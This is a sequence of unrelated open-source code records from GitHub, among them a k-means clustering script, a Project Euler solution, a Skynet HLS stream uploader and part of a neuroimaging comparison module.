\n\n\n","repo_name":"spacepy/spacepy","sub_path":"spacepy/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":213,"dataset":"github-code","pt":"54"} +{"seq_id":"70455429921","text":"###\n# Distinct primes factors\n# Problem 47\n#\n# The first two consecutive numbers to have two distinct prime factors are:\n#\n# 14 = 2 × 7\n# 15 = 3 × 5\n#\n# The first three consecutive numbers to have three distinct prime factors are:\n#\n# 644 = 2² × 7 × 23\n# 645 = 3 × 5 × 43\n# 646 = 2 × 17 × 19.\n#\n# Find the first four consecutive integers to have four distinct prime factors each. 
What is the first of these numbers?\n###\n\n\nimport itertools\n\n\n# from: https://en.wikipedia.org/wiki/Trial_division\ndef count_prime_factors(num):\n factors = []\n if num % 2 == 0:\n factors.append(2)\n while num % 2 == 0:\n num //= 2\n f = 3\n while f * f <= num:\n if num % f == 0:\n if not f in factors:\n factors.append(f)\n num //= f\n else:\n f += 2\n if num != 1:\n factors.append(num)\n return len(factors)\n\n\nfor n in itertools.count(1):\n if (count_prime_factors(n) == 4 and\n count_prime_factors(n + 1) == 4 and\n count_prime_factors(n + 2) == 4 and\n count_prime_factors(n + 3) == 4):\n print(n)\n break\n","repo_name":"cacharle/project_euler","sub_path":"python/047-distinct_primes_factors.py","file_name":"047-distinct_primes_factors.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23571086105","text":"import json\nfrom typing import Any, Mapping, Protocol\n\nfrom muutils.json_serialize import json_serialize\n\n# takes message, level, other data, and outputs message with appropriate header\n# HeaderFunction = Callable[[str, int, Any], str]\n\n\nclass HeaderFunction(Protocol):\n def __call__(self, msg: Any, lvl: int, **kwargs) -> str:\n ...\n\n\ndef md_header_function(\n msg: Any,\n lvl: int,\n stream: str | None = None,\n indent_lvl: str = \" \",\n extra_indent: str = \"\",\n **kwargs,\n) -> str:\n \"\"\"standard header function. will output\n\n - `# {msg}`\n\n for levels in [0, 9]\n\n - `## {msg}`\n\n for levels in [10, 19], and so on\n\n - `[{stream}] # {msg}`\n\n for a non-`None` stream, with level headers as before\n\n - `!WARNING! [{stream}] {msg}`\n\n for level in [-9, -1]\n\n - `!!WARNING!! [{stream}] {msg}`\n\n for level in [-19, -10] and so on\n\n \"\"\"\n stream_prefix: str = \"\"\n if stream is not None:\n stream_prefix = f\"[{stream}] \"\n\n lvl_div_10: int = lvl // 10\n\n msg_processed: str\n if isinstance(msg, Mapping):\n msg_processed = \", \".join([f\"{k}: {json_serialize(v)}\" for k, v in msg.items()])\n else:\n msg_processed = json.dumps(json_serialize(msg))\n\n if lvl >= 0:\n return f\"{extra_indent}{indent_lvl * (lvl_div_10 - 1)}{stream_prefix}#{'#' * lvl_div_10 if lvl else ''} {msg_processed}\"\n else:\n exclamation_pts: str = \"!\" * (abs(lvl) // 10)\n return f\"{extra_indent}{exclamation_pts}WARNING{exclamation_pts} {stream_prefix} {msg_processed}\"\n\n\nHEADER_FUNCTIONS: dict[str, HeaderFunction] = {\n \"md\": md_header_function,\n}\n","repo_name":"mivanit/muutils","sub_path":"muutils/logger/headerfuncs.py","file_name":"headerfuncs.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"23005637348","text":"Dataset = {\n \"listA\": [{\n \"name\": \"John\",\n \"age\": 20,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"John\",\n \"age\": 25,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"John\",\n \"age\": 30,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Alice\",\n \"age\": 35,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Joe\",\n \"age\": 40,\n \"dateJoined\": \"2020-09-25\",\n }],\n \"listB\": [{\n \"name\": \"Kate\",\n \"age\": 20,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Lisa\",\n \"age\": 21,\n \"dateJoined\": \"2019-12-23\",\n }, {\n \"name\": \"mike\",\n \"age\": 30,\n \"dateJoined\": \"2020-04-26\",\n }, {\n \"name\": \"nancy\",\n \"age\": 35,\n \"dateJoined\": \"2020-08-20\",\n }, {\n \"name\": 
\"peter\",\n \"age\": 40,\n \"dateJoined\": \"2020-03-25\",\n }\n]\n}\n\n# test User data, used to test the sorting algorithm\n\ndef quickSort(arr, left, right, parameter):\n # implementation of the quick sort algorithm based on the parameter \n def partition(arr, left, right, pivot):\n while left <= right:\n while arr[left][parameter] < pivot[parameter]:\n left +=1\n while arr[right][parameter] > pivot[parameter]:\n right -=1\n if left <= right:\n # swap the values on the right and left of the pivot point\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n # go into the list from both ends after swapping\n left += 1\n right -=1\n return left\n if left >= right:\n return \n # pivot point is always selected from the midpoint\n pivot = arr[int((left + right)/2)]\n index = partition(arr, left, right, pivot)\n \n quickSort(arr, left, index - 1, parameter)\n quickSort(arr, index, right, parameter)\n\n\n\n\n\ndef mergeSort(listA, listB):\n # perform a quick sort on the merged list\n mergedList = listA + listB\n quickSort(arr=mergedList, left=0, right=len(mergedList) - 1, parameter=\"dateJoined\")\n dates = []\n\n for i in mergedList:\n # store all the dateJoined values of all users in the data array\n print(i)\n dates.append(i[\"dateJoined\"])\n\n\n def getRepeatedValues(list):\n # this function checks for repeated value\n repeated_values = {}\n count = 1\n for i in range(len(list)):\n if i < count:\n # skip indexes if they are the same\n continue\n index_dates= [i]\n index_names = [mergedList[i][\"name\"]]\n for j in range(i+1, len(list)):\n if list[i] == list[j]:\n # compare the first element in the list to the next element \n # if equal increase count\n count +=1\n index_dates.append(j)\n index_names.append(mergedList[j][\"name\"])\n repeated_values.update({list[i]: (index_dates, index_names)})\n if j >= len(list) - 1:\n # end function of j is at the end of the loop\n return repeated_values\n else:\n # break if next element is not equal\n break\n\n print(repeated_values)\n return repeated_values\n \n # get all indexes of users with the same dateJoined\n repeated_dates = getRepeatedValues(dates).items()\n for key , value in repeated_dates:\n # sort the list based on names using the quick sort if dates are repeated\n quickSort(mergedList, value[0][0], value[0][len(value[0])-1], \"name\")\n names = [i for i in value[1]]\n # get all the names of users with the same dateJoined\n repeated_names = getRepeatedValues(names).items()\n for key2, value2 in repeated_names:\n # sort the list based on ages using the quick sort if names are repeated\n quickSort(mergedList, value2[0][0], value2[0][len(value2[0])-1], \"age\")\n\n\n print(\"\\n\\n\")\n for i in mergedList:\n print(i)\n\nmergeSort(Dataset[\"listA\"], Dataset[\"listB\"])\n","repo_name":"SydneyTechnologies/TechUnicornAssessment","sub_path":"practical3to7.py","file_name":"practical3to7.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772916901","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Tree', Difficult='Medium')\n\n\nfrom Datastruct.masterTree import readyTree\n\n\ndef hasPathSum(tree):\n ans = []\n root = tree.getHead()\n\n getPathSum(root, ans, 0)\n return ans\n\n\ndef getPathSum(node, ans, currSum):\n if not node:\n return\n\n currSum += node.data\n\n if 
node.lChild is None and node.rChild is None:\n ans.append(currSum)\n\n getPathSum(node.lChild, ans, currSum)\n getPathSum(node.rChild, ans, currSum)\n\n\nreadyTree.printTree()\nprint(hasPathSum(readyTree))\n","repo_name":"Omkar02/FAANG","sub_path":"LC_112_PathSum.py","file_name":"LC_112_PathSum.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8615872275","text":"# my code\n\nfrom fractions import Fraction\n\nn = int(input())\nr = list(map(int, input().split()))\n\nfor i in range(1 , n):\n sol = Fraction(r[0] , r[i])\n print(f\"{sol.numerator}/{sol.denominator}\")\n","repo_name":"inni-iii/Algorithm","sub_path":"coding with python/baekjoon/3036.py","file_name":"3036.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"201880514","text":"from numpy import *\nimport matplotlib\nimport matplotlib.pyplot as plt\ndef LoadDataSet(filename):\n fr = open(filename)\n DataMat = []\n for line in fr.readlines():\n Data = line.strip().split('\\t')\n line = list(map(float, Data)) #可迭代对象的批操作\n DataMat.append(line)\n print(DataMat)\n return DataMat\n\ndef distOhm(vectA, vectB): #返回向量间的欧氏距离\n return sqrt(sum(power(vectA - vectB, 2)))\n\ndef RandCenter(DataSet, k): #生成k个数据域中的随机点作为中心点\n n = shape(DataSet)[1]\n RandCent = mat(zeros((k, n), dtype=float))\n for i in range(n):\n Min = min(DataSet[:, i])\n print(Min)\n Range = float(max(DataSet[:, i]) - Min)\n RandCent[:,i] = Min + Range*random.rand(k, 1)\n return RandCent\n\ndef kMeans(DataSet, k, DistMeas = distOhm, CreateCent = RandCenter):\n m = shape(DataSet)[0] #获取数据个数\n ClusterState = mat(zeros((m, 2))) #用来储存每一个数据点的信息\n CenterMat = CreateCent(DataSet, k)\n ClusterChanging = True\n counter = 1\n while ClusterChanging:\n ClusterChanging = False\n for i in range(m): #对每一个数据点求最小距离和索引\n MinDist = inf\n MinIndex = -1\n for j in range(k):\n DistI = DistMeas(CenterMat[j], DataSet[i])\n if DistI < MinDist:\n MinDist = DistI\n MinIndex = j\n if ClusterState[i,0] != MinIndex: #如果任意一个数据的最近中心的簇号有更新就进入下一轮\n ClusterChanging = True\n ClusterState[i] = MinIndex, MinDist\n print(CenterMat)\n for center in range(k):\n DataSelect = DataSet[nonzero(ClusterState[:,0].A == center)[0]] #.A变成array格式,返回m*1的array,nonzero返回按行列的列表*2,选按行的[0]\n CenterMat[center, :] = mean(DataSelect, axis=0)\n Plot(counter, ClusterState, CenterMat, DataMat)\n counter+=1\n plt.show()\n return CenterMat, ClusterState\n\ndef Plot(counter, ClusterState, CenterMat, DataMat):\n color = [\"red\", \"purple\", \"green\", \"orange\"]\n shape = [\"+\", \"+\", \"+\", \"+\"]\n Position = [\"231\", \"232\", \"233\", \"234\", \"235\", \"236\"]\n plt.suptitle(\"The process of clustering\")\n ax1 = plt.subplot(Position[counter-1])\n plt.title(str(counter))\n for i in range(4):\n Data = DataMat[nonzero(ClusterState[:, 0].A == i)[0]]\n ax1.scatter(Data[:, 0].A.flatten(), Data[:, 1].A.flatten(), color=color[i], alpha=0.6)\n ax1.scatter(CenterMat[i, 0], CenterMat[i, 1], marker=shape[i], color = color[i], s = 80)\n\nif __name__ == \"__main__\":\n DataMat = mat(LoadDataSet(\"testSet.txt\"))\n CenterMat, ClusterState = kMeans(DataMat, 4)\n\n","repo_name":"JaireYu/Machine-Learning","sub_path":"Clustering_Learning/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"39113631730","text":"print('THE INPUTO :D')\n\nlist = []\nprint('Please choose to insert, delete, update or list')\nprint('this is to make a list\\n')\n\nconti='y'\nwhile conti == 'y' :\n insertcomand=input('What to do?')\n if insertcomand.lower() == 'insert':\n data= input('Insert your data here :')\n list.append(data)\n print(list)\n elif insertcomand.lower() == 'delete':\n list.pop()\n print(list)\n elif insertcomand.lower() == 'update':\n print(list)\n data = int(input('which one got updated (in number start with 0):'))\n updated = input('what need to be change :')\n list[data] = updated\n print(list)\n elif insertcomand.lower() == 'list':\n print(list)\n else :\n print('Error, please try again !!')\n conti = input('Do you wish to continue (y/n) ?')\nprint('Thank you for using inputo :D')\n","repo_name":"Frendy222/Frendysusanto_ITP_excersiceweek2","sub_path":"inputo.py","file_name":"inputo.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12923178341","text":"import numpy as np\nimport math\n\ndef set_source(elements,strike,dip,rake,length,width,sx,sy,sz,nl=1,nw=1):\n source_list = []\n strike_rad = np.deg2rad(strike)\n dip_rad = np.deg2rad(dip)\n\n ln = np.linspace(-length/2,length/2,nl+1)\n wn = np.linspace(-width/2,width/2,nw+1)\n\n l = np.convolve(ln,[0.5,0.5],\"valid\")\n w = np.convolve(wn,[0.5,0.5],\"valid\")\n dl = length/nl\n dw = width/nw\n\n x = np.zeros(3)\n id = 0\n for i in range(nl):\n for j in range(nw):\n x[0] = sx + l[i]*math.cos(strike_rad) - w[j]*math.cos(dip_rad)*math.sin(strike_rad)\n x[1] = sy + l[i]*math.sin(strike_rad) + w[j]*math.cos(dip_rad)*math.cos(strike_rad)\n x[2] = sz + w[j]*math.sin(dip_rad)\n\n for element in elements:\n if element.dim == 3:\n is_inside,xi = element.check_inside(x)\n if is_inside:\n source = Source(id,strike,dip,rake,dl,dw,element.id,xi[0],xi[1],xi[2])\n source_list += [source]\n id += 1\n break\n\n\n return source_list\n\n\nclass Source:\n def __init__(self,id,strike,dip,rake,length,width,element_id,xi,eta,zeta):\n self.id = id\n self.element_id = element_id\n self.xi,self.eta,self.zeta = xi,eta,zeta\n\n self.strike = np.deg2rad(strike)\n self.dip = np.deg2rad(dip)\n self.rake = np.deg2rad(rake)\n self.length = length\n self.width = width\n\n self.set_strain_tensor()\n\n def print(self):\n print(self.id,\":\",self.dip,\",\",self.width)\n print(\" \",self.element_id,\",\",(self.xi,self.zeta))\n\n def set_strain_tensor(self):\n self.strain_tensor = np.zeros(6,dtype=np.float64)\n m0 = self.width * self.length\n\n # Mxx\n self.strain_tensor[0] = -m0*( math.sin(self.dip)*math.cos(self.rake)*math.sin(2*self.strike) \\\n + math.sin(2*self.dip)*math.sin(self.rake)*math.sin(self.strike)**2)\n # Myy\n self.strain_tensor[1] = m0*( math.sin(self.dip)*math.cos(self.rake)*math.sin(2*self.strike) \\\n - math.sin(2*self.dip)*math.sin(self.rake)*math.cos(self.strike)**2)\n # Mzz\n self.strain_tensor[2] = m0*math.sin(2*self.dip)*math.sin(self.rake)\n\n # Mxy\n self.strain_tensor[3] = m0*( math.sin(self.dip)*math.cos(self.rake)*math.cos(2*self.strike) \\\n + math.sin(2*self.dip)*math.sin(self.rake)*math.sin(2*self.strike)*0.5)\n # Myz\n self.strain_tensor[4] = -m0*( math.cos(self.dip)*math.cos(self.rake)*math.sin(self.strike) \\\n - math.cos(2*self.dip)*math.sin(self.rake)*math.cos(self.strike))\n # Mxz\n self.strain_tensor[5] = -m0*( math.cos(self.dip)*math.cos(self.rake)*math.cos(self.strike) \\\n + 
math.cos(2*self.dip)*math.sin(self.rake)*math.sin(self.strike))\n","repo_name":"HiroUgoto/3D_FEM","sub_path":"python/src/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73861155363","text":"import functools\nprint = functools.partial(print, flush=True)\nprint('Initializing...')\nimport argparse\nimport config\nimport logging\nimport os\nimport glob\nimport cv2\nimport requests\nimport shutil\nfrom siaskynet import Skynet\nfrom tabulate import tabulate\nfrom threading import Thread\nimport time\n\ndef touchDir(dir, strict = False):\n\tif (strict == True and os.path.isdir(dir)):\n\t\traise Exception('Folder already exists: ' + dir)\n\tif not os.path.isdir(dir):\n\t\tos.mkdir(dir)\n\ndef rmdir(dir):\n\tif os.path.isdir(dir):\n\t\tshutil.rmtree(dir)\n\ndef skynet_push(filePath, portal):\n\tlogging.debug('Uploading ' + str(filePath) + ' with ' + str(portal))\n\n\topts = type('obj', (object,), {\n\t\t'portal_url': portal,\n\t\t'timeout': 60,\n\t\t'timeout_seconds': 60\n\t})\n\n\ttry:\n\t\ttry:\n\t\t\treturn Skynet.upload_file(filePath, opts) \n\t\texcept TimeoutError:\n\t\t\tlogging.error('Uploading timeout with ' + str(portal))\n\t\t\treturn False\n\texcept:\n\t\tlogging.error('Uploading failed with ' + str(portal))\n\t\treturn False\n\ndef upload(filePath, fileId, length):\n\tglobal concurrent_uploads, filearr, keep_files\n\tstart_time = time.time()\n\tconcurrent_uploads += 1\n\tfilearr[fileId].status = 'uploading'\n\n\t# upload file until success\n\twhile True:\n\t\t# upload and retry if fails with backup portals\n\t\tfor upload_portal in config.upload_portals:\n\t\t\tskylink = skynet_push(filePath, upload_portal)\n\t\t\tif skylink != False:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tfilearr[fileId].status = 'uploading with backup portal'\n\n\t\tif (skylink != False and len(skylink) == 52):\n\t\t\tskylink = skylink.replace(\"sia://\", \"\")\n\t\t\tfilearr[fileId].skylink = skylink\n\t\t\tif filearr[fileId].status != 'share failed':\n\t\t\t\tfilearr[fileId].status = 'share queued'\n\t\t\tfilearr[fileId].uploadTime = round(time.time() - start_time)\n\t\t\tconcurrent_uploads -= 1\n\t\t\tif keep_files == False:\n\t\t\t\tos.remove(filePath)\n\t\t\treturn True\n\t\telse:\n\t\t\tlogging.error('Upload failed with all portals for ' + str(filePath))\n\t\t\tfilearr[fileId].status = 'queued for re-uploading'\n\t\t\ttime.sleep(10)\n\t\t\tfilearr[fileId].status = 're-uploading'\n\n\ndef get_length(filename):\n\tcap = cv2.VideoCapture(filename)\n\tfps = cap.get(cv2.CAP_PROP_FPS) # OpenCV2 version 2 used \"CV_CAP_PROP_FPS\"\n\tframe_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\tduration = frame_count/fps\n\treturn duration\n\ndef get_latest_m3u8(recordFolder):\n\tpattern = os.path.join(recordFolder, '*.m3u8')\n\tlist_of_files = glob.glob(pattern) # * means all if need specific format then *.csv\n\tif not list_of_files:\n\t\treturn False\n\tlatest_file = max(list_of_files, key=os.path.getctime)\n\treturn latest_file\n\ndef chech_ts(recordFolder):\n\tfor file in os.listdir(recordFolder):\n\t\tif file.endswith(\".ts\"):\n\t\t\treturn True\n\treturn False\n\ndef isPlaylistFinished(recordFolder):\n\tglobal stream_filename\n\tplaylistFile = os.path.join(recordFolder, stream_filename + \".m3u8\")\n\tif (os.stat(playlistFile).st_size == 0):\n\t\treturn False\n\twith open(playlistFile, 'r') as f:\n\t\tlines = f.read().splitlines()\n\t\tlast_line = lines[-1]\n\t\tif last_line == 
'#EXT-X-ENDLIST':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\ndef updateDisplay(filearr, symbols):\n\tprint_str = '\\n\\n\\n\\n\\n\\n\\n\\n\\n'\n\tprint_str += 'Status symbols:\\n'\n\tsymbarray = []\n\tidx = 0\n\t\n\tfor key, value in symbols.items():\n\t\tsymbarray.append([value, key])\n\t\tidx += 1\n\ttable = (tabulate(symbarray, headers=['symbol', 'status'], tablefmt='orgtbl'))\n\tprint_str += table + '\\n\\n\\n'\n\n\tfile = ['File']\n\tstatus = ['Status']\n\tlength = ['Length']\n\tuptime = ['Upload time']\n\tterminalColumns, terminalRows = shutil.get_terminal_size()\n\tshowRows = int(terminalColumns/7) - 3\n\tran = len(filearr) if (len(filearr) < showRows) else showRows\n\tfor i in range(ran):\n\t\tind = -ran+i\n\t\tsymbolCode = filearr[ind].status\n\t\tfile.append(filearr[ind].fileId)\n\t\tstatus.append(symbols[symbolCode])\n\t\tvideoLength = round(filearr[ind].length)\n\t\tif (videoLength == -1):\n\t\t\tlength.append('')\n\t\telse:\n\t\t\tlength.append(str(videoLength) + 's')\n\t\tuploadTime = filearr[ind].uploadTime\n\t\tif (uploadTime == -1):\n\t\t\tuptime.append('')\n\t\telse:\n\t\t\tuptime.append(str(uploadTime) + 's')\n\n\ttable = (tabulate([file, status, length, uptime], tablefmt='orgtbl'))\n\tprint_str += table\n\tprint(print_str)\n\ndef share(fileId, filearr):\n\tglobal m3u8_list_upload_token, is_first_chunk\n\tfilearr[fileId].status = 'sharing'\n\tpost = {\n\t\t'token': m3u8_list_upload_token,\n\t\t'url': filearr[fileId].skylink,\n\t\t'length': filearr[fileId].length,\n\t\t'is_first_chunk': is_first_chunk\n\t\t}\n\ttry:\n\t\tx = requests.post(config.m3u8_list_upload_path, data = post)\n\t\tif (x.text != 'ok'):\n\t\t\tlogging.error('Error: posting failed ' + str(x.text))\n\t\t\tfilearr[fileId].status = 'share failed'\n\t\t\treturn False\n\t\telse:\n\t\t\tfilearr[fileId].status = 'shared'\n\t\t\tis_first_chunk = 0\n\t\t\treturn True\n\texcept Exception as e:\n\t\tlogging.error('Error: posting failed ' + str(e))\n\t\tfilearr[fileId].status = 'share failed'\n\t\treturn False\n\n\ndef share_thread():\n\tglobal filearr\n\tlastSharedFileId = -1\n\t# check_share_queue(check_share_queue, filearr)\n\twhile True:\n\t\tnextToShare = lastSharedFileId + 1\n\t\tif filearr[nextToShare].status == 'share queued' or filearr[nextToShare].status == 'share failed':\n\t\t\tif share(nextToShare, filearr) == True:\n\t\t\t\tlastSharedFileId += 1\n\t\t\telse:\n\t\t\t\ttime.sleep(10)\n\t\ttime.sleep(0.2)\n\n\nclass VideoFile:\n\tdef __init__(self, fileId):\n\t\tself.fileId = fileId\n\t\tself.status = 'waiting for file'\n\t\tself.uploadTime = -1\n\t\tself.length = -1\n\t\tself.skylink = 'skylink'\n\tdef __str__(self):\n\t\treturn str(self.__dict__)\n\nnextStreamFilename = 0\nfilearr = [\n\t# file, status, upload time, length, skylink\n\tVideoFile(nextStreamFilename)\n]\nstream_filename = ''\n\ndef worker():\n\tglobal concurrent_uploads, projectPath, recordFolder, filearr, nextStreamFilename, stream_filename\n\n\tsymbols = {\n\t\t'waiting for file':\t\t\t\t' ',\n\t\t'upload queued':\t\t\t\t'.',\n\t\t'uploading':\t\t\t\t\t'↑',\n\t\t'uploading with backup portal':\t'↕',\n\t\t'queued for re-uploading':\t\t'↔',\n\t\t're-uploading':\t\t\t\t\t'↨',\n\t\t'share queued':\t\t\t\t\t'▒',\n\t\t'sharing':\t\t\t\t\t\t'▓',\n\t\t'shared':\t\t\t\t\t\t'█',\n\t\t'share failed':\t\t\t\t\t'x'\n\t}\n\ttouchDir(recordFolder)\n\n\tcntr = 0\n\twhile True:\n\t\tlatest_m3u8 = get_latest_m3u8(recordFolder)\n\t\tif not latest_m3u8:\n\t\t\tif not (chech_ts(recordFolder)):\n\t\t\t\tprint('Waiting for recording, no .m3u8 file 
found in ' + recordFolder + ' folder (%ds)' %(cntr))\n\t\t\telse:\n\t\t\t\tprint('Starting uploading... Waiting for first chunk and for .m3u8 file in ' + recordFolder + ' folder')\n\t\t\tcntr += 1\n\t\t\ttime.sleep(1)\n\t\telse:\n\t\t\tfiletime = os.path.getctime(latest_m3u8)\n\t\t\tnow = time.time()\n\t\t\tif now-60 > filetime:\n\t\t\t\tprint(\"We found a stream, but it's older than a minute (maybe it is an old recording). Please start (or restart) the recording into \" + recordFolder)\n\t\t\t\ttime.sleep(1)\n\t\t\telse:\n\t\t\t\t# Start uplaoding\n\t\t\t\tbreak\n\n\tstream_filename = os.path.basename(latest_m3u8).replace('.m3u8', '')\n\n\tThread(target=share_thread).start()\n\twhile True:\n\t\tnextFile = os.path.join(recordFolder, stream_filename + str(nextStreamFilename) + \".ts\")\n\t\tnextAfterFile = os.path.join(recordFolder, stream_filename + str(nextStreamFilename + 1) + \".ts\")\n\t\tupdateDisplay(filearr, symbols)\n\t\tif concurrent_uploads < 10 and ( os.path.isfile(nextAfterFile) or ( isPlaylistFinished(recordFolder) and os.path.isfile(nextFile) ) ):\n\t\t\tfilearr.append(VideoFile(nextStreamFilename + 1))\n\t\t\tfilearr[nextStreamFilename].status = 'upload queued'\n\t\t\tnextLen = get_length(nextFile)\n\t\t\tfilearr[nextStreamFilename].length = nextLen\n\t\t\tThread(target=upload, args=(nextFile, nextStreamFilename, nextLen)).start()\n\t\t\tnextStreamFilename += 1\n\t\telse:\n\t\t\ttime.sleep(1)\n\t\n\nconcurrent_uploads = 0\nprojectPath = os.path.expanduser( os.path.join('~', '.SkyLive'))\ntouchDir(projectPath)\nis_first_chunk = 1\n\nlogFile = os.path.join(projectPath, \"stream_hls.log\")\nlogging.basicConfig(filename=logFile,\n\tfilemode='a',\n\tformat='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n\tdatefmt='%H:%M:%S',\n\tlevel=logging.DEBUG)\nlogging.info('LOGGING STARTED')\n\nparser = argparse.ArgumentParser('Upload HLS (m3u8) live stream to SkyLive')\nparser.add_argument('--record_folder', help='Record folder, where m3u8 and ts files are (will be) located (default: record_here)')\nparser.add_argument('--token', help='Stream token generated by skylive.coolhd.hu')\nparser.add_argument('--keep_files', help='Keep video files on disk. 
If keep-files is false (default), every .ts video chunk will be removed after upload.')\nargs = parser.parse_args()\n\n\n# get recordFolder\nif (args.record_folder):\n\tif (os.path.isabs(args.record_folder)):\n\t\trecordFolder = args.record_folder\n\telse:\n\t\trecordFolder = os.path.join(projectPath, args.record_folder)\nelse:\n\trecordFolder = os.path.join(projectPath, \"record_here\")\n\nif (args.token):\n\tm3u8_list_upload_token = args.token\nelse:\n\twhile True:\n\t\tm3u8_list_upload_token = input(\"Enter stream token: \")\n\t\tif (m3u8_list_upload_token):\n\t\t\tbreak\n\nif (args.keep_files):\n\tkf_lower = args.keep_files.lower()\n\tif kf_lower == 'true' or kf_lower == 'yes' or kf_lower == 'y':\n\t\tkeep_files = True\n\telse:\n\t\tkeep_files = False\n\t\nworker()\n","repo_name":"DaWe35/SkyLive","sub_path":"stream_hls.py","file_name":"stream_hls.py","file_ext":"py","file_size_in_byte":8969,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"54"} +{"seq_id":"11815005878","text":"import dpdata\nimport numpy as np\nimport pandas as pd\nimport matplotlib\n\noutcar_data = dpdata.LabeledSystem(\"OUTCAR\")\n\n# 提取数据\ncoords = outcar_data[\"coords\"]\n\n# 获取三维数组的形状\noriginal_shape = coords.shape\n\n# 计算新的形状,将前两个维度合并为一个,保持第三个维度不变\nnew_shape = (original_shape[0] * original_shape[1], original_shape[2])\n\n# 使用reshape方法将三维数组变为二维数组\ntwo_dim_array = coords.reshape(new_shape)\n\nprint(\"原始三维数组:\")\nprint(coords)\nprint(\"\\n变为的二维数组:\")\nprint(two_dim_array)\nprint(two_dim_array.shape)\noutput_filename = 'output_angles.txt' \nwith open(output_filename, 'w') as file:\n for angle in two_dim_array:\n file.write(f'{angle:.2f}\\n')","repo_name":"xysun25/AIMD-ML","sub_path":"dpdata/.history/1_20231013171350.py","file_name":"1_20231013171350.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3281228362","text":"import sys\nsys.setrecursionlimit(10000)\nsys.stdin = open('input.txt')\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\ndef dfs(x, y):\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < N and 0 <= ny < M: # 땅을 나가지 않는 선에서만\n if land[nx][ny] == 1: # 돌면서 1이 있으면 0으로 바꾸고 그 부분을 또 재귀로 들어가기\n land[nx][ny] = 0\n dfs(nx, ny)\n\nT = int(input())\nfor tc in range(1, T+1):\n M, N, K = map(int, input().split())\n land = [[0] * M for _ in range(N)]\n\n for i in range(K): # 배추 위치 지정\n x, y = map(int, input().split())\n land[y][x] = 1\n\n cnt = 0\n for j in range(N): # 반복문을 돌면서 필요한 배추흰지렁이 마리 수 구하기\n for k in range(M):\n if land[j][k] == 1:\n dfs(j, k)\n cnt += 1\n print(cnt)\n","repo_name":"kellyjung5512/TIL","sub_path":"03_review_study/baekjoon/BJ_1012/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13916778205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import ListView, TemplateView\nfrom ai.apps import AiConfig\n\n\nclass AiView(TemplateView):\n def get(self, request, prompt='Nothing...', *args, **kwargs):\n prompt = prompt\n response = AiConfig.co.generate(\n model='command-xlarge-nightly',\n prompt=prompt,\n max_tokens=40,\n temperature=0.6,\n stop_sequences=[\"--\"]\n )\n return HttpResponse(response)\n# Create your views 
here.\n","repo_name":"LANneeer/ai_cup","sub_path":"hackathon/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13873041552","text":"'''\nmaths.py: part of pybraincompare package\nSimple math functions\n\n'''\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nfrom .mrutils import (\n apply_threshold,\n do_mask,\n generate_thresholds,\n resample_images_ref\n)\nfrom scipy.stats import pearsonr, spearmanr, norm, t\nimport numpy as np\nfrom . import maths\nimport pandas\nimport nibabel\nimport sys\nimport os\n\n\ndef percent_to_float(x):\n return old_div(float(x.strip('%')),100)\n\ndef calculate_correlation(images,\n mask=None,\n atlas=None,\n summary=False, \n corr_type=\"pearson\"):\n\n '''calculate_correlation\n Calculate a correlation between two images\n \n images: list nibabel.Nifti1Image objects\n list of 2 nibabel objects\n\n corr_type: str\n correlation type pearson or spearman [default pearson]\n\n atlas: pybraincompare.compare.atlas\n a pybraincompare atlas object [optional]\n\n Calls calculate_pairwise_correlation, or calculate_atlas_correlation,\n which work with vectors. If you do masking of images an atlas on your\n own, you can call these other functions directly to produce a single\n or 